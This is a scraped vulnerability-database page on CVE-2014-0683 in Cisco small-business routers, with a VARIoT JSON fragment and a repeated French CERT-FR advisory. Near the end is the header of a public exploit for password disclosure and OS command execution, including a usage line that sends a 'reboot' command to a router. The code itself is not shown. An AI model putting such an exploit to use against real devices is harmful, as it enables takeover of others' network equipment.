      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "db": "BID",
        "id": "65988"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "db": "PACKETSTORM",
        "id": "124954"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "date": "2014-03-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "date": "2014-03-05T00:00:00",
        "db": "BID",
        "id": "65988"
      },
      {
        "date": "2014-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "date": "2018-12-14T18:00:57",
        "db": "PACKETSTORM",
        "id": "150781"
      },
      {
        "date": "2014-01-26T04:44:44",
        "db": "PACKETSTORM",
        "id": "124954"
      },
      {
        "date": "2014-03-06T11:55:05.287000",
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "date": "2014-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2014-01575"
      },
      {
        "date": "2018-12-15T00:00:00",
        "db": "VULHUB",
        "id": "VHN-68176"
      },
      {
        "date": "2014-03-05T00:00:00",
        "db": "BID",
        "id": "65988"
      },
      {
        "date": "2014-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      },
      {
        "date": "2018-12-15T11:29:00.303000",
        "db": "NVD",
        "id": "CVE-2014-0683"
      },
      {
        "date": "2014-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "plural  Cisco Wireless-N VPN Vulnerabilities that can gain management access in product firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001579"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-132"
      }
    ],
    "trust": 0.6
  }
}

CERTFR-2014-AVI-102

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été corrigée dans Cisco Wireless-N VPN. Elle permet à un attaquant de provoquer une atteinte à la confidentialité des données.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Cisco	N/A	Cisco CVR100W Wireless-N VPN Router version 1.0.1.19 et antérieures
Cisco	N/A	Cisco RV215W Wireless-N VPN Router version 1.1.0.5 et antérieures
Cisco	N/A	Cisco RV110W Wireless-N VPN Firewall version 1.2.0.9 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco cisco-sa-20140305-rpd du 05 mars 2014	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20140305-rpd du 05 mars 2014	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cisco CVR100W Wireless-N VPN Router version 1.0.1.19 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Cisco RV215W Wireless-N VPN Router version 1.1.0.5 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Cisco RV110W Wireless-N VPN Firewall version 1.2.0.9 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2014-0683",
      "url": "https://www.cve.org/CVERecord?id=CVE-2014-0683"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20140305-rpd du 05 mars    2014",
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
    }
  ],
  "reference": "CERTFR-2014-AVI-102",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2014-03-06T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 corrig\u00e9e dans \u003cspan class=\"textit\"\u003eCisco\nWireless-N VPN\u003c/span\u003e. Elle permet \u00e0 un attaquant de provoquer une\natteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans Cisco Wireless-N VPN",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20140305-rpd du 05 mars 2014",
      "url": null
    }
  ]
}

CERTFR-2014-AVI-102

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité a été corrigée dans Cisco Wireless-N VPN. Elle permet à un attaquant de provoquer une atteinte à la confidentialité des données.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
Cisco	N/A	Cisco CVR100W Wireless-N VPN Router version 1.0.1.19 et antérieures
Cisco	N/A	Cisco RV215W Wireless-N VPN Router version 1.1.0.5 et antérieures
Cisco	N/A	Cisco RV110W Wireless-N VPN Firewall version 1.2.0.9 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Cisco cisco-sa-20140305-rpd du 05 mars 2014	None	vendor-advisory
Bulletin de sécurité Cisco cisco-sa-20140305-rpd du 05 mars 2014	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Cisco CVR100W Wireless-N VPN Router version 1.0.1.19 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Cisco RV215W Wireless-N VPN Router version 1.1.0.5 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Cisco RV110W Wireless-N VPN Firewall version 1.2.0.9 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2014-0683",
      "url": "https://www.cve.org/CVERecord?id=CVE-2014-0683"
    }
  ],
  "links": [
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20140305-rpd du 05 mars    2014",
      "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140305-rpd"
    }
  ],
  "reference": "CERTFR-2014-AVI-102",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2014-03-06T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 a \u00e9t\u00e9 corrig\u00e9e dans \u003cspan class=\"textit\"\u003eCisco\nWireless-N VPN\u003c/span\u003e. Elle permet \u00e0 un attaquant de provoquer une\natteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.\n",
  "title": "Vuln\u00e9rabilit\u00e9 dans Cisco Wireless-N VPN",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Cisco cisco-sa-20140305-rpd du 05 mars 2014",
      "url": null
    }
  ]
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2014-0683 (GCVE-0-2014-0683)

FKIE_CVE-2014-0683

GSD-2014-0683

GHSA-7XQW-8R6G-8V75

VAR-201403-0204

Cisco RV110W Password Disclosure and OS Command Execute.

Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

Date: 2018-08

Exploit Author: RySh

Vendor Homepage: https://www.cisco.com/

Version: 1.1.0.9

Tested on: RV110W 1.1.0.9

CVE : CVE-2014-0683, CVE-2015-6396

Usage: ./{script_name} 192.168.1.1 443 "reboot"

CERTFR-2014-AVI-102

Solution

CERTFR-2014-AVI-102

Solution

Tags

Sightings

Nomenclature